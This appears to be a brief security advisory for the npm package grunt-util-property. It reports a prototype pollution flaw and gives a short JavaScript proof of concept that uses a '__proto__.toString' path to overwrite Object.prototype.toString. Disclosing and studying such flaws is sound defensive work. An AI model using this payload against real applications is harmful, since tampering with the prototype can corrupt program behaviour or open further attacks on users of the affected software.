grunt-util-property

vulnerability prototype pollution
severity 4
language javascript
registry npm

Overview

grunt-util-property is a Grunt util for getting and setting properties, this package are vulnerable to Prototype Pollution.

The function call could be tricked into adding or modifying properties of Object.prototype using a proto payload.

Proof of Concept

var grunt = require("grunt");
var a = require("grunt-util-property");
var b = a(grunt);
b.call({}, '__proto__.toString', 123);
console.log({}.toString);

References